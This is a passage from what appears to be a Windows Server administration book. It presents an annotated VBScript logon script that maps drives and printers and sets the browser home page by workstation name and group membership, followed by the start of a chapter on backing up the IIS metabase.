+(http://www.microsoft.com/downloads/details.aspx?
+FamilyID=c717d943-7e4b-4622-86eb-
+95a22b832caa)
+Active Directory Client Extensions for Windows 9x, ME
+or NT4
+(http://www.microsoft.com/windows2000/techinfo/howitworks/activedirectory/adsilinks.asp
+For more information on using Internet Explorer for status
+messages, see "Using an IE Window to Display Progress"
+(http://www.myitforum.com/articles/11/view.asp?id=3489),
+"VBScript Forms (Part 1): Using Internet Explorer for Data
+Input/Output Forms"
+(http://www.myitforum.com/articles/11/view.asp?id=4390), and
+"Using IE to Browse for Files"
+(http://www.myitforum.com/articles/11/view.asp?id=4229).
+Perform initial tasks
+This section sets up the basics of the script. In this script, I
+also call a few subroutines/functions (listed further in later
+sections) that either gather information or perform my required
+tasks. I like using subroutines and functions, because it makes
+my code reusable or easily stored in a code library for future
+
+coding endeavors. This section accomplishes the following
+major tasks:
+Call a subroutine that gathers basic system information
+Exit the script if user is logged on locally to the server
+Call subroutines to gather group memberships
+The script also performs other tasks, as discussed in comments
+throughout the code.
+'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' File: Logon.vbs
+' Updated: April 2003
+' Version: 2.1
+' Author: Dan Thomson, myITforum.com columnist
+' I can be contacted at dethomson@hotmail.com
+'
+' Usage:
+' This script can be directly assigned as a logon script for
+
+' Windows 2000 or greater clients. For older systems, this
+' script will need to be called from a logon batch file.
+'
+' Input:
+'
+' Requirements:
+' Win 9x, ME or NT 4:
+' - Active Directory Client Extensions
+' http://www.microsoft.com/windows2000/techinfo/howitworks/
+' activedirectory/adsilinks.asp
+' - Windows Script
+' http://msdn.microsoft.com/library/default.asp?url=/downloads
+' /list/webdev.asp
+' - A recent version of Internet Explorer
+'
+' Notes:
+' Tested on Windows 2000 Professional running Windows Script v5.6
+
+' and participating in an AD domain
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+On Error Resume Next
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+' Define Variables and Constants
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Dim objFileSys
+Dim objIntExplorer
+Dim objWshNetwork
+Dim objWshShell
+Dim strDomain 'Domain of the user
+Dim strHomePage 'Homepage to be set for user
+Dim strLogonPath 'Path to location from where the script is running
+Dim strOSProdType 'OS Product type (WinNT, LanmanNT, ServerNT)
+
+Dim strWorkstation 'Local Computer Name
+Dim strUserGroups 'List of groups the user is a meber of
+Dim intCounter 'General counter
+Const UseNTServer = 0 'Sets whether this script runs when logging on locally
+'to Windows Servers.
+'Values are: 1 (Yes) OR 0 (No)
+'Initialize common scripting objects
+Set objFileSys = CreateObject( "Scripting.FileSystemObject" )
+Set objWshNetwork = CreateObject( "WScript.Network" )
+Set objWshShell = CreateObject( "WScript.Shell" )
+'Pause script until user is fully logged on (applies only to Win 9x or ME)
+'This will timeout after 10 seconds
+strUser = ""
+intCounter = 0
+
+Do
+strUserID = objWshNetwork.Username
+intCounter = intCounter + 1
+Wscript.Sleep 500
+Loop Until strUserID <> "" OR intCounter > 20
+'Check for error getting username
+If strUserID = "" Then
+objWshShell.Popup "Logon script failed - Contact the Helpdesk @ x 345", , _
+"Logon script", 48
+Call Cleanup
+End If
+'Setup IE for use as a status message window
+Call SetupIE
+'Display welcome message
+Call UserPrompt ("Welcome " & strUserID)
+
+'Add horizontal line as a 'break'
+objIntExplorer.Document.WriteLn(" ")
+'Gather some basic system info
+Call GetSystemInfo
+If IsTerminalServerSession <> True Then
+'Exit if we are logging on locally to a server and the
+'script is set to NOT run on servers
+IF UseNTServer = 0 AND (strOSProdType = "LanmanNT" OR strOSProdType = "ServerNT") Then
+objWshShell.Popup "Windows Server - Exiting Logon Script!", 10, _
+"Logon to " & strDomain, 16
+Call CleanUp
+End if
+End If
+
+'Get group memberships
+strUserGroups = ""
+Call GetLocalGroupMembership
+Call GetGlobalGroupMembership
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Map drives, add shared printers and set default homepage
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Determining workstation settings
+This section determines which settings should be applied to the
+workstation, based on the name of the workstation. Our
+environment has a nice naming convention: the building, room
+number, and station number are identified in the name. For
+example, the name Blg4Rm105-03 identifies a computer as being
+station 3, located in building 4, room 105. To determine which
+mappings get assigned to a computer, all I have to do is base my
+criteria on everything on the left of the dash (-).
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+
+' Part A
+' This section performs actions based on computer name
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'The left side of the computer name contains building and room information
+If Instr( 1, strWorkstation, "-", 1) > 0 Then
+strWorkstation = _
+Left( strWorkstation, ( Instr( 1, strWorkstation, "-", 1)))
+End If
+Select Case UCase( strWorkstation )
+Case "BLD1RM101-"
+Call MapDrive ("U:", "MyShareSvr1", "MyShare1")
+Call AddPrinter ("Mydomain2", "MyPrtSvr2", "Bld1Rm101-HP4050")
+objWshNetwork.SetDefaultPrinter "\\MyPrtSvr2\Bld1Rm101-HP4050"
+
+strHomePage = "http://www.chesapeake.edu/academic_info/ " & _
+"acad_computing.asp"
+Case "BLD1RM202-"
+Call MapDrive ("U:", "MyShareSvr2", "MyShare2")
+Call AddPrinter ("Mydomain1", "MyPrtSvr1", "Bld1Rm202-HP4000")
+objWshNetwork.SetDefaultPrinter "\\MyPrtSvr1\Bld1Rm202-HP4000"
+strHomePage = "http://www.chesapeake.edu/library/default.asp"
+Case "BLD3RM104-"
+'This room uses TCP/IP printing instead of a print server.
+'Only set homepage
+strHomePage = "http://www.chesapeake.edu/writing/wchome.htm"
+Case Else
+End Select
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Adding mappings based on group
+membership
+
+Adding mappings based upon the computer name is cool.
+However, there will always be a need to perform tasks based on
+specific group membership. This section takes care of such
+tasks.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Part B
+' This section performs actions based on group membership
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+If InGroup( "ShareForStaff" ) Then
+Call MapDrive ("X:", "StaffSvr1", "StaffShare1")
+strHomePage = "http://www.chesapeake.edu/generalinfo/cambridge.asp"
+End If
+If InGroup( "ShareForStudents" ) Then
+Call MapDrive ("Y:", "StudentSvr1", "StudentShare1")
+strHomePage = "http://www.chesapeake.edu"
+End If
+
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+' End section
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Setting the IE home page and
+final message
+This section sets the IE home page (if specified), starts
+SMSls.bat, and posts a final message to the user. The script
+tests to determine if the user is a member of the Domain Admins or
+DoNotInstallSMS groups. If the user is a member of either of these
+groups, SMSls.bat is skipped. This is helpful if you want to get in
+quick to do a small task or to keep SMS off some of your more
+persnickety users' computers.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'Set default homepage
+If strHomePage <> "" Then
+Err.Clear
+objWshShell.RegWrite _
+"HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", strHomePage
+
+If Err = 0 Then Call UserPrompt ("Set Internet home page to " & strHomePage)
+End If
+'Start SMSls.bat
+'Do not run if a member of the Domain Administrators
+'or in the global group DoNotInstallSMS
+If InGroup("Domain Admins") OR InGroup("DoNotInstallSMS") Then
+Call UserPrompt ("Skipping SMSLS.BAT")
+Else
+objWshShell.Run "%COMSPEC% /c " & strLogonPath & "\smsls.bat", 0, False
+End If
+'Add horizontal line as a 'break'
+objIntExplorer.Document.WriteLn(" ")
+'Inform user that logon process is done
+Call UserPrompt ("Finished network logon processes")
+
+'Wait 10 seconds
+Wscript.Sleep (10000)
+'Close Internet Explorer
+objIntExplorer.Quit( )
+Call Cleanup
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+That's the end of the first major section of the script. The
+following subsections list and explain the various subroutines
+and functions.
+Connecting to a shared network
+printer
+The following routine is where the printer mapping occurs. It first
+verifies that the share is accessible and creates the mapping. If
+the share is not accessible or is not a valid print share, the user
+will be prompted with an error message that lets her know she
+should call the help desk.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+'
+' Sub: AddPrinter
+'
+' Purpose: Connect to shared network printer
+'
+' Input:
+' strPrtServerDomain Domain in which print server is a member
+' strPrtServer Name of print server
+' strPrtShare Share name of printer
+'
+' Output:
+'
+' Usage:
+' Call AddPrinter ("Mydomain2", "MyPrtSvr2", "Bld1Rm101-HP4050")
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Sub AddPrinter(strPrtServerDomain, strPrtServer, strPrtShare)
+
+On Error Resume Next
+Dim strPrtPath 'Full path to printer share
+Dim objPrinter 'Object reference to printer
+Dim strMsg 'Message output to user
+Dim blnError 'True / False error condition
+blnError = False
+'Build path to printer share
+strPrtPath = "\\" & strPrtServer & "\" & strPrtShare
+'Test to see if shared printer exists.
+'Proceed if yes, set error condition msg if no.
+Set objPrinter = GetObject _
+("WinNT://" & strPrtServerDomain & "/" & strPrtServer & "/" & _
+strPrtShare)
+
+If IsObject( objPrinter ) AND _
+(objPrinter.Name <> "" AND objPrinter.Class = "PrintQueue") Then
+'Different mapping techniques depending on OS version
+If objWshShell.ExpandEnvironmentStrings( "%OS%" ) = "Windows_NT" Then
+Err.Clear
+'Map printer
+objWshNetwork.AddWindowsPrinterConnection strPrtPath
+Else
+'Mapping printers for Win9x & ME is a pain and unreliable.
+End If
+Else
+blnError = True
+End IF
+'Check error condition and output appropriate user message
+
+If Err <> 0 OR blnError = True Then
+strMsg = "Unable to connect to network printer. " & vbCrLf & _
+"Please contact the Helpdesk @ ext 345" & vbCrLf & _
+"and ask them to check the " & strPrtServer & " server." & _
+vbCrLf & vbCrLf & _
+"Let them know that you are unable to connect to the '" _
+& strPrtShare & "' printer"
+objWshShell.Popup strMsg,, "Logon Error !", 48
+Else
+Call UserPrompt ("Successfully added printer connection to " & _
+strPrtPath)
+End If
+Set objPrinter = Nothing
+End Sub
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+Mapping a drive to a shared
+folder
+This routine is where the drive mapping occurs. It first removes
+any preexisting drive mapping that might be using the
+designated drive letter. Then, it verifies that the share is
+accessible and creates the mapping. If the share is not
+accessible, the user will be prompted with an error message that
+lets him know he should call the help desk.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Sub: MapDrive
+'
+' Purpose: Map a drive to a shared folder
+'
+' Input:
+' strDrive Drive letter to which share is mapped
+' strServer Name of server that hosts the share
+' strShare Share name
+'
+' Output:
+
+'
+' Usage:
+' Call MapDrive ("X:", "StaffSvr1", "StaffShare1")
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Sub MapDrive( strDrive, strServer, strShare )
+On Error Resume Next
+Dim strPath 'Full path to printer share
+Dim blnError 'True / False error condition
+blnError = False
+'Disconnect Drive if drive letter is already mapped.
+'This assures everyone has the same drive mappings
+
+If objFileSys.DriveExists(strDrive) = True Then
+objWshNetwork.RemoveNetworkDrive strDrive, , True
+End If
+'Build path to share
+strPath = "\\" & strServer & "\" & strShare
+'Test to see if share exists. Proceed if yes, set error condition if no.
+If objFileSys.DriveExists(strPath) = True Then
+Err.Clear
+objWshNetwork.MapNetworkDrive strDrive, strPath
+Else
+blnError = True
+End If
+'Check error condition and output appropriate user message
+If Err.Number <> 0 OR blnError = True Then
+'Display message box informing user that the connection failed
+
+strMsg = "Unable to connect to network share. " & vbCrLf & _
+"Please contact the Helpdesk @ ext 345 and ask them " & _
+"to check the " & strServer & " server." & vbCrLf & _
+"Let them know that you are unable to connect to the " & _
+"'" & strPath & "' share"
+objWshShell.Popup strMsg,, "Logon Error !", 48
+Else
+Call UserPrompt ("Successfully added mapped drive connection to " & strPath)
+End If
+End Sub
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Gathering local group
+memberships
+This routine collects information about any local groups to which
+the user might belong. The names of these groups get placed
+into the strUserGroups variable for future reference.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+'
+' Sub: GetLocalGroupMembership
+'
+' Purpose: Gather all local groups to which the current user belongs
+'
+' Input:
+'
+' Output: Local group names are added to strUserGroups
+'
+' Usage: Call GetLocalGroupMembership
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Sub GetLocalGroupMembership
+On Error Resume Next
+Dim colGroups 'Collection of groups on the local system
+Dim objGroup 'Object reference to individual groups
+
+Dim objUser 'Object reference to individual group member
+'Verify system is not Windows 9x or ME
+If objWshShell.ExpandEnvironmentStrings( "%OS%" ) = "Windows_NT" Then
+'Connect to local system
+Set colGroups = GetObject( "WinNT://" & strWorkstation )
+colGroups.Filter = Array( "group" )
+'Process each group
+For Each objGroup In colGroups
+'Process each user in group
+For Each objUser in objGroup.Members
+'Check if current user belongs to group being processed
+If LCase( objUser.Name ) = LCase( strUserID ) Then
+'Add group name to list
+strUserGroups = strUserGroups & objGroup.Name & ","
+End If
+Next
+
+Next
+Set colGroups = Nothing
+End If
+End Sub
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Gathering global group
+memberships
+This routine is similar to the previous one, except it collects
+information about any global (rather than local) groups to which
+the user might belong. The names of the groups also get placed
+into the strUserGroups variable for future reference. Since some
+users might still be running Windows NT domains, I use the
+WinNT syntax instead of LDAP to perform the query, for cross-
+platform interoperability. This way is a little easier anyway.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Sub: GetGlobalGroupMembership
+'
+
+' Purpose: Gather all global groups the current user belongs to
+'
+' Input:
+'
+' Output: Global group names are added to strUserGroups
+'
+' Usage: Call GetGlobalGroupMembership
+'
+' Notes: Use WinNT connection method to be backwards
+' compatible with NT 4 domains
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Sub GetGlobalGroupMembership
+On Error Resume Next
+Dim objNameSpace
+Dim objUser
+
+Const ADS_READONLY_SERVER = 4
+Set objNameSpace = GetObject( "WinNT:" )
+'Use the OpenDSObject method with the ADS_READONLY_SERVER
+'value to grab the "closest" domain controller
+'Connect to user object in the domain
+Set objUser = objNameSpace.OpenDSObject( _
+"WinNT://" & strDomain & "/" & strUserID, "", "", ADS_READONLY_SERVER)
+'Process each group
+For Each objGroup In objUser.Groups
+'Add group name to list
+strUserGroups = strUserGroups & objGroup.Name & ","
+Next
+Set objNameSpace = Nothing
+
+End Sub
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Determining if user belongs to a
+specified group
+This simple routine searches the list of group names that is
+contained in the strUserGroups variable for the specified group
+and returns True if the group is found.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Function: InGroup
+'
+' Purpose: Determine if user belongs to specified group
+'
+' Input: Name of group to test for membership
+'
+' Output: True or False
+'
+
+' Usage: If InGroup("Domain Admins") Then
+'
+' Requirements:
+' strUserGroups must have been previously populated via
+' GetLocalGroupMembership and/or GetGlobalGroupMembership
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Function InGroup(strGroup)
+On Error Resume Next
+InGroup = False
+'Search strUserGroups for strGroup
+If Instr( 1, LCase( strUserGroups ), LCase( strGroup ), 1) Then InGroup = True
+End Function
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+Gathering basic information
+about the local system
+Here is another routine that gathers specific information about
+the local computer, such as the user domain, workstation name,
+product type, and the path to the location from which the script
+is running.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Sub: GetSystemInfo
+'
+' Purpose: Gather basic information about the local system
+'
+' Input:
+'
+' Output: strDomain, strOSProdType, strWorkstation, strLogonPath
+'
+' Usage: Call GetSystemInfo
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+Private Sub GetSystemInfo
+On Error Resume Next
+'Get domain name
+If objWshShell.ExpandEnvironmentStrings( "%OS%" ) = "Windows_NT" Then
+strDomain = objWshNetwork.UserDomain
+Else
+strDomain = objWshShell.RegRead( "HKLM\System\CurrentControlSet\" & _
+"Services\MSNP32\NetWorkProvider\AuthenticatingAgent" )
+End If
+'Get Product Type from Registry (WinNT, LanmanNT, ServerNT)
+strOSProdType = objWshShell.RegRead( _
+"HKLM\System\CurrentControlSet\Control\ProductOptions\ProductType")
+'Get computer name
+
+If IsTerminalServerSession = True Then
+'Set strWorkstation to the real name and not the name of the server
+strWorkstation = objWshShell.ExpandEnvironmentStrings( "%CLIENTNAME%" )
+Else
+strWorkstation = objWshNetwork.ComputerName
+End If
+'Get the path to the location from where the script is running
+strLogonPath = Left( Wscript.ScriptFullName, _
+( InstrRev( Wscript.ScriptFullName, "\") -1))
+End Sub
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Determining if the script is
+running in a terminal server
+session
+The following routine identifies whether the user is logging on via
+
+a Windows terminal session and returns True if this is the case.
+The determinant test criteria is whether the workstation has a
+valid %ClientName% environment variable set.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Function: IsTerminalServer
+'
+' Purpose: Determine if the script is running in a terminal server session
+'
+' Input:
+'
+' Output:
+' True if running in a terminal server session
+' False if not running in a terminal server session
+' Usage:
+' If IsTerminalServerSession = True Then
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Function IsTerminalServerSession
+
+On Error Resume Next
+Dim strName
+'Detect if this is a terminal server session
+'If it is, set some names to the terminal server client name
+strName = objWshShell.ExpandEnvironmentStrings( "%CLIENTNAME%" )
+If strName <> "%CLIENTNAME%" AND strName <> "" Then _
+IsTerminalServerSession = True
+End Function
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Setting up IE for use as a status
+message window
+I like to use Internet Explorer as a general status message
+
+screen for users. This routine gets Internet Explorer set up and
+ready for this purpose.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Sub: SetupIE
+'
+' Purpose: Set up Internet Explorer for use as a status message window
+'
+' Input:
+'
+' Output:
+'
+' Usage: Call SetupIE
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Sub SetupIE
+On Error Resume Next
+
+Dim strTitle 'Title of IE window
+Dim intCount 'Counter used during AppActivate
+strTitle = "Logon script status"
+'Create reference to objIntExplorer
+'This will be used for the user messages. Also set IE display attributes
+Set objIntExplorer = Wscript.CreateObject("InternetExplorer.Application")
+With objIntExplorer
+.Navigate "about:blank"
+.ToolBar = 0
+.Menubar = 0
+.StatusBar = 0
+.Width = 600
+.Height = 350
+.Left = 100
+.Top = 100
+
+End With
+'Set some formating
+With objIntExplorer.Document
+.WriteLn ("")
+.WriteLn ("")
+.WriteLn ("" & strTitle & " ")
+.WriteLn ("")
+.WriteLn ("")
+End With
+'Wait for IE to finish
+Do While (objIntExplorer.Busy)
+Wscript.Sleep 200
+Loop
+
+'Show IE
+objIntExplorer.Visible = 1
+'Make IE the active window
+For intCount = 1 To 100
+If objWshShell.AppActivate(strTitle) Then Exit For
+WScript.Sleep 50
+Next
+End Sub
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Using IE as a status message
+window
+Finally, the last routine is just a little helper for the status
+message window. There's nothing fancy going on here.
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+
+'
+' Sub: UserPrompt
+'
+' Purpose: Use Internet Explorer as a status message window
+'
+' Input: strPrompt
+'
+' Output: Output is sent to the open Internet Explorer window
+'
+' Usage:
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Private Sub UserPrompt( strPrompt )
+On Error Resume Next
+objIntExplorer.Document.WriteLn (strPrompt & " ")
+
+End Sub
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+'
+' Sub: Cleanup
+'
+' Purpose: Release common objects and exit script
+'
+' Input:
+'
+' Output:
+'
+' Usage: Call Cleanup
+'
+''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
+Sub Cleanup
+
+On Error Resume Next
+Set objFileSys = Nothing
+Set objWshNetwork = Nothing
+Set objWshShell = Nothing
+Set objIntExplorer = Nothing
+'Exit script
+Wscript.Quit( )
+End Sub
+Running the Hack
+Since I still have a few NT clients on my network, I place a
+batch file named logon.bat in the NETLOGON shares on my domain
+controllers. All users are then assigned this logon.bat file as
+their startup script. This logon.bat file verifies that the user is on
+a supported platform (NT, 2000, or XP) and then kicks in the
+logon.vbs script via a call like this (depending on the path to the
+script):
+
+cscript //nologo %0\..\logon.vbs
+To keep the user informed of the logon progress, status
+messages are posted to an Internet Explorer window.
+These are the three results of running the logon script:
+The user gets the appropriate printer added.
+The user gets mapped drives added where appropriate.
+The user's homepage is reset (depending on group
+membership and computer name).
+This sample logon script can prove useful for small
+organizations. However, storing all the mapping information in
+the script can soon become unwieldy. If you are in a large
+organization and want to perform tasks at logon based on
+computer names, it might be best to offload the mapping
+information to a network database that can be queried via the
+logon script.
+Dan Thomson
+
+Chapter 6. IIS
+Hacks #54-61
+Section 54. Back Up the Metabase
+Section 55. Restore the Metabase
+Section 56. Map the Metabase
+Section 57. Metabase Hacks
+Section 58. Hide the Metabase
+Section 59. IIS Administration Scripts
+Section 60. Run Other Web Servers
+Section 61. IISFAQ
+
+Hacks #54-61
+Internet Information Services (IIS) is one of the more popular
+features of Windows server platforms. Whether you're running
+IIS 5 (Windows 2000 Server) or IIS 6 (Windows Server 2003),
+the ability to hack the metabase (the place where IIS stores its
+configuration settings) lets you do things that are impossible to
+do using the standard GUI tool for managing IISnamely, Internet
+Services Manager.
+Before you start hacking the metabase, however, you'd better be
+sure you've backed it up properly and know your way around
+inside it. Several hacks in this chapter deal with these topics,
+including how to restore the metabase when you have no working
+backup. Also included are tips on how to hide the metabase from
+attackers to make it more secure, how to use scripts to manage
+different aspects of IIS, and how to allow other HTTP services,
+such as the Apache web server, to run on Windows and coexist
+with IIS.
+
+Hack 54 Back Up the Metabase
+There's more than one reason for backing up the metabase, and
+there are different ways of doing it too.
+Instead of storing its configuration settings in the Windows
+Registry, like most other services store their configuration
+settings, IIS stores most of its settings in a file called the
+metabase. On Windows 2000 (IIS 5), the metabase is a binary
+file named MetaBase.bin, found in the
+%SystemRoot%\system32\inetsrv folder. Windows Server 2003
+(IIS 6) uses XML as the format for its configuration information,
+rather than the proprietary binary format used by IIS 5. As a
+result, there are two metabase files in IIS 6: the metabase
+proper (MetaBase.xml), where configuration settings are stored,
+and an associated XML schema file (MBSchema.xml) that defines
+the XML syntax of the MetaBase.xml file. Because of the
+differences between these two platforms, we'll have to consider
+them separately when backing up IIS settings.
+Why Back Up the Metabase?
+Many IIS administrators don't realize that there are two reasons
+for backing up the metabase and each reason requires a different
+method for doing so. The most obvious reason is to prepare for
+the eventuality of a disaster. Note that I said eventuality instead
+of possibility, because wise system administrators know that it's
+
+only a matter of time before something horrid happens. To
+prepare for such a disaster, you certainly want to back up the
+metabase on your IIS machines, but having a backup of the
+metabase alone isn't going to be much help if the hard drive
+containing your boot volume is toast; the proper functioning of
+the metabase depends on having access to some encryption
+keys that are part of the System State on your server. System
+State is a fancy phrase for a collection of important configuration
+information that lets you recover the predisaster state of your
+system after a massive failure renders it unbootable. You'll find
+more information about what's included in a server's System
+State in [Hack #92] in Chapter 10.
+So, here's the point: if you back up the IIS metabase without its
+associated System State, you won't be able to recover your web
+server after a disaster. Microsoft doesn't document clearly in
+either their Windows help files or on their web site that, by
+default, when you back up the System State information on a
+Windows 2000 or Windows Server 2003 machine, you also
+automatically back up the metabasethat is, if you've left your
+backup settings at their defaults. Let's dig a little deeper.
+Advanced Backup Settings
+Hidden away in the Windows Backup utility is a properties box
+called Advanced Backup Options (Figure 6-1). To access
+Advanced Backup Options, select the items you want to back
+up, click Start Backup, and then click Advanced.
+Figure 6-1. The Advanced Backup Options
+properties box in the Backup utility
+
+When you choose to back up the server's System State, the
+setting "Automatically backup System Protected files with the
+System State" is selected by default. This setting actually
+backs up the entire contents of the %SystemRoot% folder and all
+its subfolders along with the rest of the System State
+information on the server. Of course, the inetsrv directory where
+the metabase is found is part of this directory hierarchy, so the
+metabase gets backed up along the way. So, if you want to back
+up the IIS metabase for comprehensive recovery from a
+disaster, simply back up the System State using Backup (or its
+command-line version, ntbackup). Since the "Automatically
+backup System Protected Files with the System State"
+checkbox automatically adds several hundred megabytes to the
+size of your System State backup, if you're the kind of person
+who likes living dangerously and you want to save on tape and
+
+speed up your backup, you could deselect this checkbox.
+Naturally, it's usually best to avoid cutting corners like this and
+leave the setting checked.
+Quick Backups
+Preparing for that eventual disaster isn't the only reason for
+backing up the metabase. You should also make backup copies
+of the metabase if you plan on tinkering with it, either using
+MetaEdit (metaedit.exe)a tool in the Windows 2000 Server
+Resource Kit, used for editing the IIS 5 metabaseor a text editor
+such as Notepad, which you can use to edit the XML metabase
+of IIS 6 directly. The danger here is that indelicately laying
+hands on the metabase might break something and render your
+metabase unreadable to IIS, forcing you to restore before your
+WWW Publishing Service starts again and users can access your
+web sites. The syntax of the metabase is strict, and any
+untoward alterations could cause a service to behave
+unpredictably at best, or just fail altogether at worst. So, before
+you roll up your sleeves and start fiddling with your metabase, it
+behooves you to make a quick backup.
+You could back up the entire System State on your machine
+before touching the metabase, but that's overkill. You could use
+Backup to back up only the inetsrv directory on your server, but
+there are faster and simpler ways.
+IIS 5
+You can back up the metabase from the GUI by using Internet
+
+Services Manager, the MMC console used for configuring and
+managing IIS. Right-click on the node that represents your
+server and select Backup/Restore Configuration to open a dialog
+box of the same name, as shown in Figure 6-2. Click the "Create
+backup..." button, type a descriptive name for your backup, and
+click OK. Backups are stored in the
+%SystemRoot%\System32\InetSrv\MetaBack directory; to be
+extra careful, you can include this directory in your regular tape
+backups.
+Figure 6-2. Backing up the metabase
+Restoring the metabase is just as straightforward: select the
+metabase backup you want to restore and click Restore.
+If you're using MetaEdit to editing the IIS 5 metabase, you're in
+luck; conveniently enough, MetaEdit itself is capable of making
+
+quick metabase backups.
+Before you start using MetaEdit, however, be sure to download
+the latest version of the tool from Microsoft's web site.
+Interestingly, when you search the Microsoft Download Center
+(http://www.microsoft.com/downloads/) for metaedit, you only get
+Version 2.0 of the tool, which is out of date. To obtain the latest
+version of the tool (MetaEdit 2.2), see Microsoft Knowledge
+Base article 232068
+(http://support.microsoft.com/default.aspx?scid=kb;en-
+us;232068), which has a link to the installation package.
+Once you download and install the self-extracting file, you have
+two tools to play with: a Metabase Browser/Editor similar to
+Registry Editor and a Metabase Consistency Checker designed
+to ensure the syntax of the metabase remains consistent.
+Unfortunately, the Consistency Checker isn't too useful,
+because it won't repair certain types of mistakes you can make
+with the Browser/Editor, such as entering illegal values for
+metabase keys. So, just like when you edit the Registry directly,
+you're on your own and in dangerous territory.
+In fact, it's always a good idea to back up the metabase
+periodically, even if you make changes to your metabase only
+through the Internet Services Manager GUI. That way, if you
+make a lot of configuration changes to IIS and discover your
+web applications acting a mite odd, you can reverse those
+changes quickly and easily by restoring the metabase from
+recent backup. In fact, this might be the only way to return to a
+working IIS configuration if you can't remember all the changes
+you've made. So, regular metabase backups are a part of good
+housekeeping on your IIS machines.
+Backing up the metabase with MetaEdit is straightforward:
+simply open MetaEdit (it's installed by default under
+Administrative Tools) and select Metabase Backup/Restore
+
+from the menu. This opens the same Configuration
+Backup/Restore dialog box (Figure 6-2) and saves backups in
+the same MetaBack directory as before. GUI- and MetaEdit-made
+backups are compatible, so you can back up using one way and
+restore using the other if you prefer.
+Remember that these quick backups of the metabase are
+designed only to recover from a corrupt metabase or to restore
+the metabase to an earlier working condition; you cannot use
+them to restore an IIS machine from scratch; use System State
+for that. Also, note that a metabase backup made on one
+machine cannot be restored to a different machine, due to the
+differences in System State information between the machines.
+There's a workaround for that too, though: export the metabase
+instead of backing it up. Exporting saves all or part of the
+metabase in a text file instead of in the proprietary binary format
+used for metabase backups. Note that exporting the metabase
+requires you use MetaEdit, because export functionality is not
+included in Internet Services Manager for IIS 5.
+Exporting the metabase is useful if you want to document the
+contents of your metabase by printing it out. It's also useful for
+copying web site configurations from one IIS machine to another.
+For example, if you want to mirror a site on two machines, simply
+export the metabase keys for the web site and then import the
+export file into the second machine. But don't forget to copy your
+site content as well; remember that the metabase contains only
+IIS configuration information, not the content of your web sites.
+IIS 6
+Metabase backups are even easier in IIS 6, because the
+
+functionality is built right into Internet Services Manager. In
+fact, in addition to allowing you to back up the metabase
+manually, IIS 6 also automatically backs up the metabase
+whenever configuration changes have been made. Let's look at
+these automatic backups first.
+IIS 6 automatically saves time-stamped (versioned) copies of
+the metabase; these copies are called history files and are
+saved in the %SystemRoot%\system32\intesrv\history folder.
+History files are identified by two numbers: major version and
+minor version. The major version number is incremented
+whenever you stop and start IIS using the GUI or net stop
+iisadmin on the command line, when IIS flushes the in-memory
+metabase to disk, or when you manually save the IIS
+configuration to disk. This provides a safety net, so you can
+recover an earlier configuration if you've made a series of
+changes and can't remember what they were, let alone how to
+undo them. When a new major version history file is saved, IIS
+includes a reference to this file in the MetaBase.xml file itself.
+Minor versions are somewhat different. IIS increments the minor
+version number if you have edit-while-running enabled and make
